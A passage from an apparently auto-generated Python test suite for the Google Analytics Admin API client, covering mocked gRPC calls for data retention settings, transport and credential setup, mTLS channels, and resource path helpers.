call.return_value = resources.DataRetentionSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_data_retention_settings(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_data_retention_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_data_retention_settings( analytics_admin.GetDataRetentionSettingsRequest(), name="name_value", ) def test_update_data_retention_settings( transport: str = "grpc", request_type=analytics_admin.UpdateDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) response = client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True def test_update_data_retention_settings_from_dict(): test_update_data_retention_settings(request_type=dict) def test_update_data_retention_settings_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: client.update_data_retention_settings() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest() @pytest.mark.asyncio async def test_update_data_retention_settings_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateDataRetentionSettingsRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings( name="name_value", event_data_retention=resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS, reset_user_data_on_new_activity=True, ) ) response = await client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDataRetentionSettingsRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DataRetentionSettings) assert response.name == "name_value" assert ( response.event_data_retention == resources.DataRetentionSettings.RetentionDuration.TWO_MONTHS ) assert response.reset_user_data_on_new_activity is True @pytest.mark.asyncio async def test_update_data_retention_settings_async_from_dict(): await test_update_data_retention_settings_async(request_type=dict) def test_update_data_retention_settings_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDataRetentionSettingsRequest() request.data_retention_settings.name = "data_retention_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: call.return_value = resources.DataRetentionSettings() client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "data_retention_settings.name=data_retention_settings.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_data_retention_settings_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDataRetentionSettingsRequest() request.data_retention_settings.name = "data_retention_settings.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) await client.update_data_retention_settings(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "data_retention_settings.name=data_retention_settings.name/value", ) in kw["metadata"] def test_update_data_retention_settings_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_data_retention_settings( data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].data_retention_settings == resources.DataRetentionSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) def test_update_data_retention_settings_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_data_retention_settings( analytics_admin.UpdateDataRetentionSettingsRequest(), data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_data_retention_settings_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_data_retention_settings), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DataRetentionSettings() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DataRetentionSettings() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_data_retention_settings( data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].data_retention_settings == resources.DataRetentionSettings( name="name_value" ) assert args[0].update_mask == field_mask_pb2.FieldMask(paths=["paths_value"]) @pytest.mark.asyncio async def test_update_data_retention_settings_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_data_retention_settings( analytics_admin.UpdateDataRetentionSettingsRequest(), data_retention_settings=resources.DataRetentionSettings(name="name_value"), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_credentials_transport_error(): # It is an error to provide credentials and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # It is an error to provide a credentials file and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( client_options={"credentials_file": "credentials.json"}, transport=transport, ) # It is an error to provide scopes and a transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) with pytest.raises(ValueError): client = AnalyticsAdminServiceClient( client_options={"scopes": ["1", "2"]}, transport=transport, ) def test_transport_instance(): # A client may be instantiated with a custom transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) client = AnalyticsAdminServiceClient(transport=transport) assert client.transport is transport def test_transport_get_channel(): # A client may be instantiated with a custom transport instance. transport = transports.AnalyticsAdminServiceGrpcTransport( credentials=ga_credentials.AnonymousCredentials(), ) channel = transport.grpc_channel assert channel transport = transports.AnalyticsAdminServiceGrpcAsyncIOTransport( credentials=ga_credentials.AnonymousCredentials(), ) channel = transport.grpc_channel assert channel @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_transport_adc(transport_class): # Test default credentials are used if not provided. with mock.patch.object(google.auth, "default") as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class() adc.assert_called_once() def test_transport_grpc_default(): # A client should use the gRPC transport by default. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) assert isinstance(client.transport, transports.AnalyticsAdminServiceGrpcTransport,) def test_analytics_admin_service_base_transport_error(): # Passing both a credentials object and credentials_file should raise an error with pytest.raises(core_exceptions.DuplicateCredentialArgs): transport = transports.AnalyticsAdminServiceTransport( credentials=ga_credentials.AnonymousCredentials(), credentials_file="credentials.json", ) def test_analytics_admin_service_base_transport(): # Instantiate the base transport. with mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport.__init__" ) as Transport: Transport.return_value = None transport = transports.AnalyticsAdminServiceTransport( credentials=ga_credentials.AnonymousCredentials(), ) # Every method on the transport should just blindly # raise NotImplementedError. methods = ( "get_account", "list_accounts", "delete_account", "update_account", "provision_account_ticket", "list_account_summaries", "get_property", "list_properties", "create_property", "delete_property", "update_property", "get_user_link", "batch_get_user_links", "list_user_links", "audit_user_links", "create_user_link", "batch_create_user_links", "update_user_link", "batch_update_user_links", "delete_user_link", "batch_delete_user_links", "get_web_data_stream", "delete_web_data_stream", "update_web_data_stream", "create_web_data_stream", "list_web_data_streams", "get_ios_app_data_stream", "delete_ios_app_data_stream", "update_ios_app_data_stream", "list_ios_app_data_streams", "get_android_app_data_stream", "delete_android_app_data_stream", "update_android_app_data_stream", "list_android_app_data_streams", "get_enhanced_measurement_settings", "update_enhanced_measurement_settings", "create_firebase_link", "delete_firebase_link", "list_firebase_links", "get_global_site_tag", "create_google_ads_link", "update_google_ads_link", "delete_google_ads_link", "list_google_ads_links", "get_data_sharing_settings", "get_measurement_protocol_secret", "list_measurement_protocol_secrets", "create_measurement_protocol_secret", "delete_measurement_protocol_secret", "update_measurement_protocol_secret", "search_change_history_events", "get_google_signals_settings", "update_google_signals_settings", "create_conversion_event", "get_conversion_event", "delete_conversion_event", "list_conversion_events", "get_display_video360_advertiser_link", "list_display_video360_advertiser_links", "create_display_video360_advertiser_link", "delete_display_video360_advertiser_link", "update_display_video360_advertiser_link", "get_display_video360_advertiser_link_proposal", "list_display_video360_advertiser_link_proposals", "create_display_video360_advertiser_link_proposal", "delete_display_video360_advertiser_link_proposal", "approve_display_video360_advertiser_link_proposal", "cancel_display_video360_advertiser_link_proposal", "create_custom_dimension", "update_custom_dimension", "list_custom_dimensions", "archive_custom_dimension", "get_custom_dimension", "create_custom_metric", "update_custom_metric", "list_custom_metrics", "archive_custom_metric", "get_custom_metric", "get_data_retention_settings", "update_data_retention_settings", ) for method in methods: with pytest.raises(NotImplementedError): getattr(transport, method)(request=object()) with pytest.raises(NotImplementedError): transport.close() @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_base_transport_with_credentials_file(): # Instantiate the base transport with a credentials file with mock.patch.object( google.auth, "load_credentials_from_file", autospec=True ) as load_creds, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None load_creds.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport( credentials_file="credentials.json", quota_project_id="octopus", ) load_creds.assert_called_once_with( "credentials.json", scopes=None, default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_base_transport_with_credentials_file_old_google_auth(): # Instantiate the base transport with a credentials file with mock.patch.object( google.auth, "load_credentials_from_file", autospec=True ) as load_creds, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None load_creds.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport( credentials_file="credentials.json", quota_project_id="octopus", ) load_creds.assert_called_once_with( "credentials.json", scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) def test_analytics_admin_service_base_transport_with_adc(): # Test the default credentials are used if credentials and credentials_file are None. with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch( "google.analytics.admin_v1alpha.services.analytics_admin_service.transports.AnalyticsAdminServiceTransport._prep_wrapped_messages" ) as Transport: Transport.return_value = None adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport = transports.AnalyticsAdminServiceTransport() adc.assert_called_once() @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_auth_adc(): # If no credentials are provided, we should use ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) AnalyticsAdminServiceClient() adc.assert_called_once_with( scopes=None, default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id=None, ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_auth_adc_old_google_auth(): # If no credentials are provided, we should use ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) AnalyticsAdminServiceClient() adc.assert_called_once_with( scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id=None, ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) @requires_google_auth_gte_1_25_0 def test_analytics_admin_service_transport_auth_adc(transport_class): # If credentials and host are not provided, the transport class should use # ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class(quota_project_id="octopus", scopes=["1", "2"]) adc.assert_called_once_with( scopes=["1", "2"], default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) @requires_google_auth_lt_1_25_0 def test_analytics_admin_service_transport_auth_adc_old_google_auth(transport_class): # If credentials and host are not provided, the transport class should use # ADC credentials. with mock.patch.object(google.auth, "default", autospec=True) as adc: adc.return_value = (ga_credentials.AnonymousCredentials(), None) transport_class(quota_project_id="octopus") adc.assert_called_once_with( scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), quota_project_id="octopus", ) @pytest.mark.parametrize( "transport_class,grpc_helpers", [ (transports.AnalyticsAdminServiceGrpcTransport, grpc_helpers), (transports.AnalyticsAdminServiceGrpcAsyncIOTransport, grpc_helpers_async), ], ) def test_analytics_admin_service_transport_create_channel( transport_class, grpc_helpers ): # If credentials and host are not provided, the transport class should use # ADC credentials. with mock.patch.object( google.auth, "default", autospec=True ) as adc, mock.patch.object( grpc_helpers, "create_channel", autospec=True ) as create_channel: creds = ga_credentials.AnonymousCredentials() adc.return_value = (creds, None) transport_class(quota_project_id="octopus", scopes=["1", "2"]) create_channel.assert_called_with( "analyticsadmin.googleapis.com:443", credentials=creds, credentials_file=None, quota_project_id="octopus", default_scopes=( "https://www.googleapis.com/auth/analytics.edit", "https://www.googleapis.com/auth/analytics.manage.users", "https://www.googleapis.com/auth/analytics.manage.users.readonly", "https://www.googleapis.com/auth/analytics.readonly", ), scopes=["1", "2"], default_host="analyticsadmin.googleapis.com", ssl_credentials=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_grpc_transport_client_cert_source_for_mtls( transport_class, ): cred = ga_credentials.AnonymousCredentials() # Check ssl_channel_credentials is used if provided. with mock.patch.object(transport_class, "create_channel") as mock_create_channel: mock_ssl_channel_creds = mock.Mock() transport_class( host="squid.clam.whelk", credentials=cred, ssl_channel_credentials=mock_ssl_channel_creds, ) mock_create_channel.assert_called_once_with( "squid.clam.whelk:443", credentials=cred, credentials_file=None, scopes=None, ssl_credentials=mock_ssl_channel_creds, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) # Check if ssl_channel_credentials is not provided, then client_cert_source_for_mtls # is used. with mock.patch.object(transport_class, "create_channel", return_value=mock.Mock()): with mock.patch("grpc.ssl_channel_credentials") as mock_ssl_cred: transport_class( credentials=cred, client_cert_source_for_mtls=client_cert_source_callback, ) expected_cert, expected_key = client_cert_source_callback() mock_ssl_cred.assert_called_once_with( certificate_chain=expected_cert, private_key=expected_key ) def test_analytics_admin_service_host_no_port(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_options=client_options.ClientOptions( api_endpoint="analyticsadmin.googleapis.com" ), ) assert client.transport._host == "analyticsadmin.googleapis.com:443" def test_analytics_admin_service_host_with_port(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), client_options=client_options.ClientOptions( api_endpoint="analyticsadmin.googleapis.com:8000" ), ) assert client.transport._host == "analyticsadmin.googleapis.com:8000" def test_analytics_admin_service_grpc_transport_channel(): channel = grpc.secure_channel("http://localhost/", grpc.local_channel_credentials()) # Check that channel is used if provided. transport = transports.AnalyticsAdminServiceGrpcTransport( host="squid.clam.whelk", channel=channel, ) assert transport.grpc_channel == channel assert transport._host == "squid.clam.whelk:443" assert transport._ssl_channel_credentials == None def test_analytics_admin_service_grpc_asyncio_transport_channel(): channel = aio.secure_channel("http://localhost/", grpc.local_channel_credentials()) # Check that channel is used if provided. transport = transports.AnalyticsAdminServiceGrpcAsyncIOTransport( host="squid.clam.whelk", channel=channel, ) assert transport.grpc_channel == channel assert transport._host == "squid.clam.whelk:443" assert transport._ssl_channel_credentials == None # Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are # removed from grpc/grpc_asyncio transport constructor. @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_transport_channel_mtls_with_client_cert_source( transport_class, ): with mock.patch( "grpc.ssl_channel_credentials", autospec=True ) as grpc_ssl_channel_cred: with mock.patch.object( transport_class, "create_channel" ) as grpc_create_channel: mock_ssl_cred = mock.Mock() grpc_ssl_channel_cred.return_value = mock_ssl_cred mock_grpc_channel = mock.Mock() grpc_create_channel.return_value = mock_grpc_channel cred = ga_credentials.AnonymousCredentials() with pytest.warns(DeprecationWarning): with mock.patch.object(google.auth, "default") as adc: adc.return_value = (cred, None) transport = transport_class( host="squid.clam.whelk", api_mtls_endpoint="mtls.squid.clam.whelk", client_cert_source=client_cert_source_callback, ) adc.assert_called_once() grpc_ssl_channel_cred.assert_called_once_with( certificate_chain=b"cert bytes", private_key=b"key bytes" ) grpc_create_channel.assert_called_once_with( "mtls.squid.clam.whelk:443", credentials=cred, credentials_file=None, scopes=None, ssl_credentials=mock_ssl_cred, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) assert transport.grpc_channel == mock_grpc_channel assert transport._ssl_channel_credentials == mock_ssl_cred # Remove this test when deprecated arguments (api_mtls_endpoint, client_cert_source) are # removed from grpc/grpc_asyncio transport constructor. @pytest.mark.parametrize( "transport_class", [ transports.AnalyticsAdminServiceGrpcTransport, transports.AnalyticsAdminServiceGrpcAsyncIOTransport, ], ) def test_analytics_admin_service_transport_channel_mtls_with_adc(transport_class): mock_ssl_cred = mock.Mock() with mock.patch.multiple( "google.auth.transport.grpc.SslCredentials", __init__=mock.Mock(return_value=None), ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred), ): with mock.patch.object( transport_class, "create_channel" ) as grpc_create_channel: mock_grpc_channel = mock.Mock() grpc_create_channel.return_value = mock_grpc_channel mock_cred = mock.Mock() with pytest.warns(DeprecationWarning): transport = transport_class( host="squid.clam.whelk", credentials=mock_cred, api_mtls_endpoint="mtls.squid.clam.whelk", client_cert_source=None, ) grpc_create_channel.assert_called_once_with( "mtls.squid.clam.whelk:443", credentials=mock_cred, credentials_file=None, scopes=None, ssl_credentials=mock_ssl_cred, quota_project_id=None, options=[ ("grpc.max_send_message_length", -1), ("grpc.max_receive_message_length", -1), ], ) assert transport.grpc_channel == mock_grpc_channel def test_account_path(): account = "squid" expected = "accounts/{account}".format(account=account,) actual = AnalyticsAdminServiceClient.account_path(account) assert expected == actual def test_parse_account_path(): expected = { "account": "clam", } path = AnalyticsAdminServiceClient.account_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_account_path(path) assert expected == actual def test_account_summary_path(): account_summary = "whelk" expected = "accountSummaries/{account_summary}".format( account_summary=account_summary, ) actual = AnalyticsAdminServiceClient.account_summary_path(account_summary) assert expected == actual def test_parse_account_summary_path(): expected = { "account_summary": "octopus", } path = AnalyticsAdminServiceClient.account_summary_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_account_summary_path(path) assert expected == actual def test_android_app_data_stream_path(): property = "oyster" android_app_data_stream = "nudibranch" expected = "properties/{property}/androidAppDataStreams/{android_app_data_stream}".format( property=property, android_app_data_stream=android_app_data_stream, ) actual = AnalyticsAdminServiceClient.android_app_data_stream_path( property, android_app_data_stream ) assert expected == actual def test_parse_android_app_data_stream_path(): expected = { "property": "cuttlefish", "android_app_data_stream": "mussel", } path = AnalyticsAdminServiceClient.android_app_data_stream_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_android_app_data_stream_path(path) assert expected == actual def test_conversion_event_path(): property = "winkle" conversion_event = "nautilus" expected = "properties/{property}/conversionEvents/{conversion_event}".format( property=property, conversion_event=conversion_event, ) actual = AnalyticsAdminServiceClient.conversion_event_path( property, conversion_event ) assert expected == actual def test_parse_conversion_event_path(): expected = { "property": "scallop", "conversion_event": "abalone", } path = AnalyticsAdminServiceClient.conversion_event_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_conversion_event_path(path) assert expected == actual def test_custom_dimension_path(): property = "squid" expected = "properties/{property}/customDimensions".format(property=property,) actual = AnalyticsAdminServiceClient.custom_dimension_path(property) assert expected == actual def test_parse_custom_dimension_path(): expected = { "property": "clam", } path = AnalyticsAdminServiceClient.custom_dimension_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_custom_dimension_path(path) assert expected == actual def test_custom_metric_path(): property = "whelk" expected = "properties/{property}/customMetrics".format(property=property,) actual = AnalyticsAdminServiceClient.custom_metric_path(property) assert expected == actual def test_parse_custom_metric_path(): expected = { "property": "octopus", } path = AnalyticsAdminServiceClient.custom_metric_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_custom_metric_path(path) assert expected == actual def test_data_retention_settings_path(): property = "oyster" expected = "properties/{property}/dataRetentionSettings".format(property=property,) actual = AnalyticsAdminServiceClient.data_retention_settings_path(property) assert expected == actual def test_parse_data_retention_settings_path(): expected = { "property": "nudibranch", } path = AnalyticsAdminServiceClient.data_retention_settings_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_data_retention_settings_path(path) assert expected == actual def test_data_sharing_settings_path(): account = "cuttlefish" expected = "accounts/{account}/dataSharingSettings".format(account=account,) actual = AnalyticsAdminServiceClient.data_sharing_settings_path(account) assert expected == actual def test_parse_data_sharing_settings_path(): expected = { "account": "mussel", } path = AnalyticsAdminServiceClient.data_sharing_settings_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_data_sharing_settings_path(path) assert expected == actual def test_display_video360_advertiser_link_path(): property = "winkle" display_video_360_advertiser_link = "nautilus" expected = "properties/{property}/displayVideo360AdvertiserLinks/{display_video_360_advertiser_link}".format( property=property, display_video_360_advertiser_link=display_video_360_advertiser_link, ) actual = AnalyticsAdminServiceClient.display_video360_advertiser_link_path( property, display_video_360_advertiser_link ) assert expected == actual def test_parse_display_video360_advertiser_link_path(): expected = { "property": "scallop", "display_video_360_advertiser_link": "abalone", } path = AnalyticsAdminServiceClient.display_video360_advertiser_link_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_display_video360_advertiser_link_path( path ) assert expected == actual def test_display_video360_advertiser_link_proposal_path(): property = "squid" display_video_360_advertiser_link_proposal = "clam" expected = "properties/{property}/displayVideo360AdvertiserLinkProposals/{display_video_360_advertiser_link_proposal}".format( property=property, display_video_360_advertiser_link_proposal=display_video_360_advertiser_link_proposal, ) actual = AnalyticsAdminServiceClient.display_video360_advertiser_link_proposal_path( property, display_video_360_advertiser_link_proposal ) assert expected == actual def test_parse_display_video360_advertiser_link_proposal_path(): expected = { "property": "whelk", "display_video_360_advertiser_link_proposal": "octopus", } path = AnalyticsAdminServiceClient.display_video360_advertiser_link_proposal_path( **expected ) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_display_video360_advertiser_link_proposal_path( path ) assert expected == actual def test_enhanced_measurement_settings_path(): property = "oyster" web_data_stream = "nudibranch" expected = "properties/{property}/webDataStreams/{web_data_stream}/enhancedMeasurementSettings".format( property=property, web_data_stream=web_data_stream, ) actual = AnalyticsAdminServiceClient.enhanced_measurement_settings_path( property, web_data_stream ) assert expected == actual def test_parse_enhanced_measurement_settings_path(): expected = { "property": "cuttlefish", "web_data_stream": "mussel", } path = AnalyticsAdminServiceClient.enhanced_measurement_settings_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_enhanced_measurement_settings_path(path) assert expected == actual def test_firebase_link_path(): property = "winkle" firebase_link = "nautilus" expected = "properties/{property}/firebaseLinks/{firebase_link}".format( property=property, firebase_link=firebase_link, ) actual = AnalyticsAdminServiceClient.firebase_link_path(property, firebase_link) assert expected == actual def test_parse_firebase_link_path(): expected = { "property": "scallop", "firebase_link": "abalone", } path = AnalyticsAdminServiceClient.firebase_link_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_firebase_link_path(path) assert expected == actual def test_global_site_tag_path(): property = "squid" expected = "properties/{property}/globalSiteTag".format(property=property,) actual = AnalyticsAdminServiceClient.global_site_tag_path(property) assert expected == actual def test_parse_global_site_tag_path(): expected = { "property": "clam", } path = AnalyticsAdminServiceClient.global_site_tag_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_global_site_tag_path(path) assert expected == actual def test_google_ads_link_path(): property = "whelk" google_ads_link = "octopus" expected = "properties/{property}/googleAdsLinks/{google_ads_link}".format( property=property, google_ads_link=google_ads_link, ) actual = AnalyticsAdminServiceClient.google_ads_link_path(property, google_ads_link) assert expected == actual def test_parse_google_ads_link_path(): expected = { "property": "oyster", "google_ads_link": "nudibranch", } path = AnalyticsAdminServiceClient.google_ads_link_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_google_ads_link_path(path) assert expected == actual def test_google_signals_settings_path(): property = "cuttlefish" expected = "properties/{property}/googleSignalsSettings".format(property=property,) actual = AnalyticsAdminServiceClient.google_signals_settings_path(property) assert expected == actual def test_parse_google_signals_settings_path(): expected = { "property": "mussel", } path = AnalyticsAdminServiceClient.google_signals_settings_path(**expected) # Check that the path construction is reversible. actual = AnalyticsAdminServiceClient.parse_google_signals_settings_path(path) assert expected == actual def test_ios_app_data_stream_path(): property = "winkle" ios_app_data_stream = "nautilus" expected = "properties/{property}/iosAppDataStreams/{ios_app_data_stream}".format( property=property, ios_app_data_stream=ios_app_data_stream, ) actual = AnalyticsAdminServiceClient.ios_app_data_stream_path( property, ios_app_data_stream ) assert expected == actual def test_parse_ios_app_data_stream_path(): expected = { "property": "scallop", "ios_app_data_stream": "abalone", } path = 